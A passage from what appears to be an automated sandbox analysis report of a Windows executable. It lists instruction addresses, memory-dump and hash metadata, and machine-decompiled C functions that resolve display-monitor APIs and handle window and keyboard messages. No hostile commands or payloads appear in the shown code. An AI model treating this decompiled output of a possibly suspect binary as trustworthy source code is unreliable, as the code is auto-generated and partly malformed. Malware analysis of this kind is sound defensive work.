                                                                                                                            0x0041baef
                                                                                                                            0x0041bafc
                                                                                                                            0x0041bb04
                                                                                                                            0x0041bb06
                                                                                                                            0x0041bb1b
                                                                                                                            0x0041bb32
                                                                                                                            0x0041bb35
                                                                                                                            0x0041bb3a
                                                                                                                            0x0041bb3f
                                                                                                                            0x0041bb6a
                                                                                                                            0x0041bb6a
                                                                                                                            0x0041bb6d
                                                                                                                            0x0041bb76
                                                                                                                            0x0041bb79
                                                                                                                            0x0041bc4e
                                                                                                                            0x0041bc4e
                                                                                                                            0x0041bc54
                                                                                                                            0x0041bd0b
                                                                                                                            0x0041bd0e
                                                                                                                            0x0041bd12
                                                                                                                            0x0041bd17
                                                                                                                            0x0041bd1b
                                                                                                                            0x0041bd1e
                                                                                                                            0x0041bd20
                                                                                                                            0x0041bd23
                                                                                                                            0x0041bd28
                                                                                                                            0x00000000
                                                                                                                            0x0041bd1e
                                                                                                                            0x0041bc5e
                                                                                                                            0x0041bc83
                                                                                                                            0x0041bc86
                                                                                                                            0x0041bc89
                                                                                                                            0x0041bc8c
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041bc8e
                                                                                                                            0x00000000
                                                                                                                            0x0041bc9f
                                                                                                                            0x0041bca6
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041bd03
                                                                                                                            0x0041bd06
                                                                                                                            0x0041bd09
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041bcbe
                                                                                                                            0x0041bcc1
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041bcc8
                                                                                                                            0x0041bccb
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041bcab
                                                                                                                            0x0041bcae
                                                                                                                            0x0041bcb1
                                                                                                                            0x0041bcb3
                                                                                                                            0x0041bcb6
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041bcd5
                                                                                                                            0x0041bcda
                                                                                                                            0x0041bcdd
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041bce5
                                                                                                                            0x0041bce8
                                                                                                                            0x0041bcea
                                                                                                                            0x0041bcee
                                                                                                                            0x0041bcf1
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041bcf5
                                                                                                                            0x0041bcf8
                                                                                                                            0x0041bcfb
                                                                                                                            0x0041bcfc
                                                                                                                            0x0041bcfd
                                                                                                                            0x0041bcfe
                                                                                                                            0x0041bcff
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041bc9b
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041bc8e
                                                                                                                            0x0041bc62
                                                                                                                            0x0041bc67
                                                                                                                            0x0041bc6d
                                                                                                                            0x0041bc6f
                                                                                                                            0x0041bc71
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041bc77
                                                                                                                            0x0041bc7d
                                                                                                                            0x0041bb95
                                                                                                                            0x0041bb95
                                                                                                                            0x0041bb9a
                                                                                                                            0x0041bb9a
                                                                                                                            0x0041bb9d
                                                                                                                            0x0041bba6
                                                                                                                            0x0041bba6
                                                                                                                            0x0041bbab
                                                                                                                            0x0041bbb1
                                                                                                                            0x0041bbb4
                                                                                                                            0x0041bbb6
                                                                                                                            0x0041bbba
                                                                                                                            0x0041bbbc
                                                                                                                            0x0041bbc4
                                                                                                                            0x0041bbc5
                                                                                                                            0x0041bbcb
                                                                                                                            0x0041bbcb
                                                                                                                            0x0041bbcd
                                                                                                                            0x0041bbd3
                                                                                                                            0x0041bbd9
                                                                                                                            0x0041bbe1
                                                                                                                            0x0041bbe9
                                                                                                                            0x0041bbec
                                                                                                                            0x0041bbec
                                                                                                                            0x0041bbf7
                                                                                                                            0x0041bbfd
                                                                                                                            0x0041bbff
                                                                                                                            0x0041bc06
                                                                                                                            0x0041bc0b
                                                                                                                            0x0041bc0e
                                                                                                                            0x0041bc0e
                                                                                                                            0x0041bc16
                                                                                                                            0x0041bc18
                                                                                                                            0x0041bc1f
                                                                                                                            0x0041bc24
                                                                                                                            0x0041bc27
                                                                                                                            0x0041bc27
                                                                                                                            0x0041bc2f
                                                                                                                            0x0041bc34
                                                                                                                            0x0041bc3a
                                                                                                                            0x0041bc46
                                                                                                                            0x0041bc49
                                                                                                                            0x00000000
                                                                                                                            0x0041bc49
                                                                                                                            0x0041bb83
                                                                                                                            0x0041bb89
                                                                                                                            0x0041bb90
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041bb92
                                                                                                                            0x00000000
                                                                                                                            0x0041bb41
                                                                                                                            0x0041bb44
                                                                                                                            0x0041bb4a
                                                                                                                            0x0041bb65
                                                                                                                            0x0041bb65
                                                                                                                            0x0041bb68
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041bb50
                                                                                                                            0x0041bb52
                                                                                                                            0x0041bb54
                                                                                                                            0x0041bb5a
                                                                                                                            0x0041bb5b
                                                                                                                            0x0041bb61
                                                                                                                            0x0041bb61
                                                                                                                            0x0041bb64
                                                                                                                            0x0041bb64
                                                                                                                            0x00000000
                                                                                                                            0x0041bb64
                                                                                                                            0x0041bb56
                                                                                                                            0x0041bb58
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041bb58
                                                                                                                            0x00000000
                                                                                                                            0x0041bb65
                                                                                                                            0x0041b8c4
                                                                                                                            0x0041b8c8
                                                                                                                            0x0041b8c9
                                                                                                                            0x0041b8d8
                                                                                                                            0x0041b8e3
                                                                                                                            0x0041b8e6
                                                                                                                            0x0041b8ee
                                                                                                                            0x0041b8f1
                                                                                                                            0x0041b8f4
                                                                                                                            0x0041b8fa
                                                                                                                            0x0041b8fa
                                                                                                                            0x0041b8fe
                                                                                                                            0x0041b901
                                                                                                                            0x0041b904
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041b90a
                                                                                                                            0x0041b90f
                                                                                                                            0x0041b912
                                                                                                                            0x0041b918
                                                                                                                            0x0041b91b
                                                                                                                            0x0041b91e
                                                                                                                            0x0041b921
                                                                                                                            0x0041b927
                                                                                                                            0x0041b92a
                                                                                                                            0x0041b92d
                                                                                                                            0x0041b937
                                                                                                                            0x0041b937
                                                                                                                            0x0041b93a
                                                                                                                            0x0041b942
                                                                                                                            0x0041b944
                                                                                                                            0x0041ba61
                                                                                                                            0x0041ba66
                                                                                                                            0x0041ba69
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041ba6b
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041ba72
                                                                                                                            0x0041ba75
                                                                                                                            0x0041ba77
                                                                                                                            0x0041ba7d
                                                                                                                            0x0041ba87
                                                                                                                            0x0041ba8e
                                                                                                                            0x0041ba90
                                                                                                                            0x0041ba9c
                                                                                                                            0x0041baa0
                                                                                                                            0x0041baa5
                                                                                                                            0x0041baa9
                                                                                                                            0x0041baad
                                                                                                                            0x0041baaf
                                                                                                                            0x0041bab2
                                                                                                                            0x0041bab7
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041b94a
                                                                                                                            0x0041b94a
                                                                                                                            0x0041baba
                                                                                                                            0x0041baba
                                                                                                                            0x0041babd
                                                                                                                            0x0041babd
                                                                                                                            0x0041bac1
                                                                                                                            0x00000000
                                                                                                                            0x0041bac1
                                                                                                                            0x0041b951
                                                                                                                            0x0041b955
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041b95b
                                                                                                                            0x00000000
                                                                                                                            0x0041b970
                                                                                                                            0x0041b973
                                                                                                                            0x0041b975
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041b998
                                                                                                                            0x0041b99c
                                                                                                                            0x0041b9a1
                                                                                                                            0x0041b9a4
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041b9ab
                                                                                                                            0x0041b9af
                                                                                                                            0x0041b9b4
                                                                                                                            0x0041b9b7
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041b9be
                                                                                                                            0x0041b9c1
                                                                                                                            0x0041b9c3
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041b9c7
                                                                                                                            0x0041b9ca
                                                                                                                            0x0041b9cc
                                                                                                                            0x0041b9ce
                                                                                                                            0x0041b9cf
                                                                                                                            0x0041b9d2
                                                                                                                            0x0041b9d8
                                                                                                                            0x0041b9dc
                                                                                                                            0x0041b9de
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041b9e4
                                                                                                                            0x0041b9e6
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041ba39
                                                                                                                            0x0041ba3c
                                                                                                                            0x0041ba40
                                                                                                                            0x0041ba42
                                                                                                                            0x0041ba44
                                                                                                                            0x0041ba44
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041ba49
                                                                                                                            0x0041ba4d
                                                                                                                            0x0041ba50
                                                                                                                            0x0041ba53
                                                                                                                            0x0041ba55
                                                                                                                            0x0041ba56
                                                                                                                            0x0041ba57
                                                                                                                            0x0041ba58
                                                                                                                            0x0041ba59
                                                                                                                            0x0041ba5c
                                                                                                                            0x0041ba5e
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041b9f1
                                                                                                                            0x0041b9f1
                                                                                                                            0x0041b9f4
                                                                                                                            0x0041b9f6
                                                                                                                            0x0041b9f8
                                                                                                                            0x0041b9f9
                                                                                                                            0x0041b9fc
                                                                                                                            0x0041b9ff
                                                                                                                            0x0041ba04
                                                                                                                            0x0041ba07
                                                                                                                            0x0041ba0b
                                                                                                                            0x0041ba11
                                                                                                                            0x0041ba15
                                                                                                                            0x0041ba17
                                                                                                                            0x0041ba1d
                                                                                                                            0x0041ba1d
                                                                                                                            0x0041ba20
                                                                                                                            0x0041ba23
                                                                                                                            0x0041ba26
                                                                                                                            0x0041ba2b
                                                                                                                            0x0041ba2f
                                                                                                                            0x00000000
                                                                                                                            0x0041ba2f
                                                                                                                            0x0041ba19
                                                                                                                            0x0041ba1b
                                                                                                                            0x0041b9ec
                                                                                                                            0x0041b9ec
                                                                                                                            0x00000000
                                                                                                                            0x0041b9ec
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041b962
                                                                                                                            0x0041b965
                                                                                                                            0x0041b969
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041b97d
                                                                                                                            0x0041b980
                                                                                                                            0x0041b983
                                                                                                                            0x0041b986
                                                                                                                            0x0041b986
                                                                                                                            0x0041b989
                                                                                                                            0x0041b989
                                                                                                                            0x0041b98b
                                                                                                                            0x0041b990
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041b95b
                                                                                                                            0x0041bac3
                                                                                                                            0x0041bac3
                                                                                                                            0x0041bac7
                                                                                                                            0x0041baca
                                                                                                                            0x0041bad3
                                                                                                                            0x0041bad3
                                                                                                                            0x0041badc
                                                                                                                            0x00000000
                                                                                                                            0x0041badc

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: String$Variant$ClearFree_memset$ChangeException@8H_prolog3ThrowTypelstrlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4128688680-0
                                                                                                                            • Opcode ID: 85f9946e4a71283cc8a9dc1c553748c8e74c5e86e833509d64cd1f502e420362
                                                                                                                            • Instruction ID: aebf2e98f95895336b2a52ab240225304cd6265481b14582b50051e212ea4fd5
                                                                                                                            • Opcode Fuzzy Hash: 85f9946e4a71283cc8a9dc1c553748c8e74c5e86e833509d64cd1f502e420362
                                                                                                                            • Instruction Fuzzy Hash: 1DF19D70D00209DFDF15DFA9D884AEEBBB0EF04304F14406AE951A72A1D7789E96CF99
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00407C68 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 77libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 97%
                                                                                                                            			E00407C68() {
				void* __ebx;
				void* __esi;
				struct HINSTANCE__* _t5;
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t9;
				_Unknown_base(*)()* _t10;
				_Unknown_base(*)()* _t11;
				_Unknown_base(*)()* _t12;
				struct HINSTANCE__* _t18;
				void* _t20;
				intOrPtr _t23;
				_Unknown_base(*)()* _t24;

				_t23 =  *0x44429c; // 0x1
				if(_t23 == 0) {
					_push(_t20);
					 *0x4442a0 = E00407C10(0, _t20, __eflags);
					_t18 = GetModuleHandleA("USER32");
					__eflags = _t18;
					if(_t18 == 0) {
						L12:
						 *0x444280 = 0;
						 *0x444284 = 0;
						 *0x444288 = 0;
						 *0x44428c = 0;
						 *0x444290 = 0;
						 *0x444294 = 0;
						 *0x444298 = 0;
						_t5 = 0;
					} else {
						_t6 = GetProcAddress(_t18, "GetSystemMetrics");
						__eflags = _t6;
						 *0x444280 = _t6;
						if(_t6 == 0) {
							goto L12;
						} else {
							_t7 = GetProcAddress(_t18, "MonitorFromWindow");
							__eflags = _t7;
							 *0x444284 = _t7;
							if(_t7 == 0) {
								goto L12;
							} else {
								_t8 = GetProcAddress(_t18, "MonitorFromRect");
								__eflags = _t8;
								 *0x444288 = _t8;
								if(_t8 == 0) {
									goto L12;
								} else {
									_t9 = GetProcAddress(_t18, "MonitorFromPoint");
									__eflags = _t9;
									 *0x44428c = _t9;
									if(_t9 == 0) {
										goto L12;
									} else {
										_t10 = GetProcAddress(_t18, "EnumDisplayMonitors");
										__eflags = _t10;
										 *0x444294 = _t10;
										if(_t10 == 0) {
											goto L12;
										} else {
											_t11 = GetProcAddress(_t18, "GetMonitorInfoA");
											__eflags = _t11;
											 *0x444290 = _t11;
											if(_t11 == 0) {
												goto L12;
											} else {
												_t12 = GetProcAddress(_t18, "EnumDisplayDevicesA");
												__eflags = _t12;
												 *0x444298 = _t12;
												if(_t12 == 0) {
													goto L12;
												} else {
													_t5 = 1;
													__eflags = 1;
												}
											}
										}
									}
								}
							}
						}
					}
					 *0x44429c = 1;
					return _t5;
				} else {
					_t24 =  *0x444290; // 0x75bc9850
					return 0 | _t24 != 0x00000000;
				}
			}

















                                                                                                                            0x00407c6b
                                                                                                                            0x00407c71
                                                                                                                            0x00407c80
                                                                                                                            0x00407c8c
                                                                                                                            0x00407c97
                                                                                                                            0x00407c99
                                                                                                                            0x00407c9b
                                                                                                                            0x00407d2f
                                                                                                                            0x00407d2f
                                                                                                                            0x00407d35
                                                                                                                            0x00407d3b
                                                                                                                            0x00407d41
                                                                                                                            0x00407d47
                                                                                                                            0x00407d4d
                                                                                                                            0x00407d53
                                                                                                                            0x00407d59
                                                                                                                            0x00407ca1
                                                                                                                            0x00407cad
                                                                                                                            0x00407caf
                                                                                                                            0x00407cb1
                                                                                                                            0x00407cb6
                                                                                                                            0x00000000
                                                                                                                            0x00407cb8
                                                                                                                            0x00407cbe
                                                                                                                            0x00407cc0
                                                                                                                            0x00407cc2
                                                                                                                            0x00407cc7
                                                                                                                            0x00000000
                                                                                                                            0x00407cc9
                                                                                                                            0x00407ccf
                                                                                                                            0x00407cd1
                                                                                                                            0x00407cd3
                                                                                                                            0x00407cd8
                                                                                                                            0x00000000
                                                                                                                            0x00407cda
                                                                                                                            0x00407ce0
                                                                                                                            0x00407ce2
                                                                                                                            0x00407ce4
                                                                                                                            0x00407ce9
                                                                                                                            0x00000000
                                                                                                                            0x00407ceb
                                                                                                                            0x00407cf1
                                                                                                                            0x00407cf3
                                                                                                                            0x00407cf5
                                                                                                                            0x00407cfa
                                                                                                                            0x00000000
                                                                                                                            0x00407cfc
                                                                                                                            0x00407d02
                                                                                                                            0x00407d04
                                                                                                                            0x00407d06
                                                                                                                            0x00407d0b
                                                                                                                            0x00000000
                                                                                                                            0x00407d0d
                                                                                                                            0x00407d13
                                                                                                                            0x00407d15
                                                                                                                            0x00407d17
                                                                                                                            0x00407d1c
                                                                                                                            0x00000000
                                                                                                                            0x00407d1e
                                                                                                                            0x00407d20
                                                                                                                            0x00407d20
                                                                                                                            0x00407d20
                                                                                                                            0x00407d1c
                                                                                                                            0x00407d0b
                                                                                                                            0x00407cfa
                                                                                                                            0x00407ce9
                                                                                                                            0x00407cd8
                                                                                                                            0x00407cc7
                                                                                                                            0x00407cb6
                                                                                                                            0x00407d23
                                                                                                                            0x00407d2e
                                                                                                                            0x00407c73
                                                                                                                            0x00407c75
                                                                                                                            0x00407c7f
                                                                                                                            0x00407c7f

                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,75BD5D80,00407DB4,?,?,?,?,?,?,?,00409C3E,00000000,00000002,00000028), ref: 00407C91
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 00407CAD
                                                                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00407CBE
                                                                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00407CCF
                                                                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 00407CE0
                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 00407CF1
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00407D02
                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 00407D13
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                                            • String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                                                                                                            • API String ID: 667068680-68207542
                                                                                                                            • Opcode ID: 5c033ec0e73e52e14ca1627bdd40e87634d56c3ad4bf27d4049c5e3fb35d08f2
                                                                                                                            • Instruction ID: 807cfe9a7b144098b7e93da265e4f9085d10d51958e7f6ddcb6cf60dc25711a9
                                                                                                                            • Opcode Fuzzy Hash: 5c033ec0e73e52e14ca1627bdd40e87634d56c3ad4bf27d4049c5e3fb35d08f2
                                                                                                                            • Instruction Fuzzy Hash: 15215074E046055AD3015FA67CC166EBBF4BBCE79036409BFF104E22A0D7B860439E1D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004172BC Relevance: 26.0, APIs: 17, Instructions: 452windowkeyboardCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 84%
                                                                                                                            			E004172BC(void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, signed int _a4, struct tagMSG* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v24;
				int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				struct HWND__* _v52;
				signed int _t139;
				signed int _t141;
				void* _t142;
				signed int _t146;
				signed int _t149;
				intOrPtr _t150;
				signed int _t152;
				signed char _t153;
				signed int _t154;
				signed int _t155;
				int _t156;
				signed int _t161;
				signed int _t165;
				void* _t167;
				signed char _t171;
				signed int _t172;
				signed int _t173;
				signed int _t174;
				signed char _t182;
				intOrPtr _t183;
				signed int _t184;
				short _t188;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t195;
				signed int _t198;
				signed char _t199;
				signed int _t200;
				signed int _t201;
				short _t204;
				signed int _t206;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				void* _t211;
				signed int _t215;
				signed int _t216;
				struct HWND__* _t217;
				struct tagMSG* _t221;
				intOrPtr _t224;
				void* _t231;
				struct tagMSG* _t240;
				signed int _t242;
				int _t243;
				signed int _t244;
				long _t247;
				intOrPtr _t249;
				signed int _t251;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				signed int _t258;
				void* _t260;
				void* _t262;

				_t236 = __edx;
				_t232 = __ecx;
				_t260 = _t262;
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t139 = E00417119(_a4, _a8);
				_t238 = _t139;
				if(_t139 == 0) {
					_t232 = _a4;
					_t231 = E00408AC7(_a4);
					if(_t231 != 0) {
						_t221 =  *((intOrPtr*)(_t231 + 0x44));
						_a8 = _t221;
						if(_t221 != 0) {
							while(1) {
								_t9 = _t231 + 0x40; // 0x40
								_t232 = _t9;
								_t258 =  *(E00403A5E( &_a8));
								_t224 =  *((intOrPtr*)(_t258 + 4));
								if(_t224 != 0 && _t224 ==  *((intOrPtr*)(_t231 + 0x70))) {
									break;
								}
								if( *_t258 == 0 ||  *_t258 != GetFocus()) {
									if(_a8 != 0) {
										continue;
									} else {
									}
								} else {
									break;
								}
								goto L10;
							}
							_t238 = _t258;
						}
					}
				}
				L10:
				_t247 = 0;
				while(1) {
					_t238 = E0041716B(_t232, _t236, _a4, _t238, _a12);
					if(_t238 == 0) {
						break;
					}
					_t142 = E00416C16(_t238);
					_pop(_t232);
					if(_t142 == 0) {
						L14:
						if(_t238 == 0) {
							L21:
							__eflags =  *(_t238 + 4);
							if( *(_t238 + 4) == 0) {
								E0040D8B0(_t232);
								asm("int3");
								_push(0x28);
								E0041E9B4(E00431D95, 0, _t238, _t247);
								_t146 = _a4;
								__eflags = _t146;
								if(_t146 != 0) {
									_v48 =  *((intOrPtr*)(_t146 + 0x20));
								} else {
									_v48 = _v48 & _t146;
								}
								_t240 = _a8;
								_t249 = _t240->message;
								_v32 = _t249;
								_v52 = GetFocus();
								_t149 = E0040A17C(0, _t236, _t260, _t148);
								_t229 = 0x100;
								__eflags = _t249 - 0x100;
								_v24 = _t149;
								if(_t249 < 0x100) {
									L34:
									__eflags = _t249 + 0xfffffe00 - 9;
									if(_t249 + 0xfffffe00 > 9) {
										goto L56;
									} else {
										goto L35;
									}
								} else {
									__eflags = _t249 - 0x109;
									if(_t249 <= 0x109) {
										L35:
										__eflags = _t149;
										if(_t149 == 0) {
											L56:
											_t251 = 0;
											_v28 = 0;
											_t150 = E0040A17C(_t229, _t236, _t260,  *_t240);
											_v44 = _v44 & 0;
											_v36 = _t150;
											_t152 = _v32 - _t229;
											__eflags = _t152;
											_v40 = 2;
											if(_t152 == 0) {
												_t153 = E00416BC9(_v36, _t240);
												_t232 =  *(_t240 + 8) & 0x0000ffff;
												__eflags = _t232 - 0x1b;
												if(__eflags > 0) {
													__eflags = _t232 - 0x25;
													if(_t232 < 0x25) {
														goto L75;
													} else {
														__eflags = _t232 - 0x26;
														if(_t232 <= 0x26) {
															_v44 = 1;
															goto L110;
														} else {
															__eflags = _t232 - 0x28;
															if(_t232 <= 0x28) {
																L110:
																_t171 = E00416BC9(_v24, _t240);
																__eflags = _t171 & 0x00000001;
																if((_t171 & 0x00000001) != 0) {
																	goto L75;
																} else {
																	__eflags = _v44;
																	_t232 = _a4;
																	_push(0);
																	if(_v44 == 0) {
																		_t172 = E0040D76E(_t232);
																	} else {
																		_t172 = E0040D720(_t232);
																	}
																	_t254 = _t172;
																	__eflags = _t254;
																	if(_t254 == 0) {
																		goto L75;
																	} else {
																		__eflags =  *(_t254 + 8);
																		if( *(_t254 + 8) != 0) {
																			_t232 = _a4;
																			E0040D2CA(_a4, _t254);
																		}
																		__eflags =  *(_t254 + 4);
																		if( *(_t254 + 4) == 0) {
																			_t173 =  *_t254;
																			__eflags = _t173;
																			if(_t173 == 0) {
																				_t232 = _a4;
																				_t174 = E00416C87(_a4, _v24, _v44);
																			} else {
																				_t174 = E0040A17C(_t229, _t236, _t260, _t173);
																			}
																			_t242 = _t174;
																			__eflags = _t242;
																			if(_t242 == 0) {
																				goto L75;
																			} else {
																				_t229 = 0;
																				 *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x4c)) + 0x70)) = 0;
																				E00416CC1(_t242);
																				__eflags =  *(_t254 + 8);
																				if( *(_t254 + 8) != 0) {
																					SendMessageA( *(_t242 + 0x20), 0xf1, 1, 0);
																				}
																				goto L125;
																			}
																		} else {
																			_t232 =  *(_t254 + 4);
																			 *((intOrPtr*)( *( *(_t254 + 4)) + 0xac))(_t240);
																			goto L125;
																		}
																	}
																}
															} else {
																__eflags = _t232 - 0x2b;
																if(_t232 != 0x2b) {
																	goto L75;
																} else {
																	goto L97;
																}
															}
														}
													}
													goto L126;
												} else {
													if(__eflags == 0) {
														L103:
														_t243 = 0;
														__eflags = 0;
														goto L104;
													} else {
														__eflags = _t232 - 3;
														if(_t232 == 3) {
															goto L103;
														} else {
															__eflags = _t232 - 9;
															if(_t232 == 9) {
																__eflags = _t153 & 0x00000002;
																if((_t153 & 0x00000002) != 0) {
																	goto L75;
																} else {
																	_t188 = GetKeyState(0x10);
																	_t255 = _a4;
																	__eflags = _t188;
																	_t229 = 0 | _t188 < 0x00000000;
																	_t232 = _t255;
																	_t189 = E0040D187(_t255, _t236, 0, _t188 < 0);
																	__eflags = _t189;
																	if(_t189 == 0) {
																		goto L75;
																	} else {
																		__eflags =  *(_t189 + 4);
																		if( *(_t189 + 4) == 0) {
																			_t190 =  *_t189;
																			__eflags = _t190;
																			if(_t190 == 0) {
																				_t232 = _t255;
																				_t191 = E00404916(_t255, _v36, _t229);
																			} else {
																				_t191 = E0040A17C(_t229, _t236, _t260, _t190);
																			}
																			_t244 = _t191;
																			__eflags = _t244;
																			if(_t244 != 0) {
																				 *( *((intOrPtr*)(_t255 + 0x4c)) + 0x70) =  *( *((intOrPtr*)(_t255 + 0x4c)) + 0x70) & 0x00000000;
																				E00416CC1(_t244);
																				E00416E8B(_t229, _t232, _t236, _t260, _v24, _t244);
																				_pop(_t232);
																			}
																		} else {
																			_t195 =  *(_t189 + 4);
																			_t236 =  *_t195;
																			_t232 = _t195;
																			 *((intOrPtr*)( *_t195 + 0xac))(_t240);
																		}
																		goto L125;
																	}
																}
																goto L126;
															} else {
																__eflags = _t232 - 0xd;
																if(_t232 == 0xd) {
																	L97:
																	__eflags = _t153 & 0x00000004;
																	if((_t153 & 0x00000004) != 0) {
																		goto L75;
																	} else {
																		_t182 = E00416C66(_v24);
																		__eflags = _t182 & 0x00000010;
																		_pop(_t232);
																		if((_t182 & 0x00000010) == 0) {
																			_t183 = E0041700C(_a4);
																		} else {
																			_t251 = _v24;
																			_t232 = _t251;
																			_t183 = E0040CEC6(_t251);
																		}
																		_t243 = 0;
																		__eflags = _t251;
																		_v40 = _t183;
																		if(_t251 != 0) {
																			L105:
																			_t232 = _t251;
																			_t184 = E0040CF40(_t251);
																			__eflags = _t184;
																			if(_t184 != 0) {
																				__eflags =  *((intOrPtr*)(_t251 + 0x50)) - _t243;
																				if( *((intOrPtr*)(_t251 + 0x50)) == _t243) {
																					goto L75;
																				} else {
																					_push(_t243);
																					_push(_t243);
																					_push(_t243);
																					_push(1);
																					_push(0xfffffdd9);
																					_push(_t251);
																					_v8 = _t243;
																					E0040CF9D();
																					_v8 = _v8 | 0xffffffff;
																					goto L125;
																				}
																			} else {
																				MessageBeep(_t243);
																				goto L75;
																			}
																		} else {
																			L104:
																			_t251 = E00416F06(_t236, _a4, _v40);
																			__eflags = _t251 - _t243;
																			if(_t251 == _t243) {
																				goto L75;
																			} else {
																				goto L105;
																			}
																		}
																	}
																	goto L126;
																} else {
																	goto L75;
																}
															}
														}
													}
												}
												goto L79;
											} else {
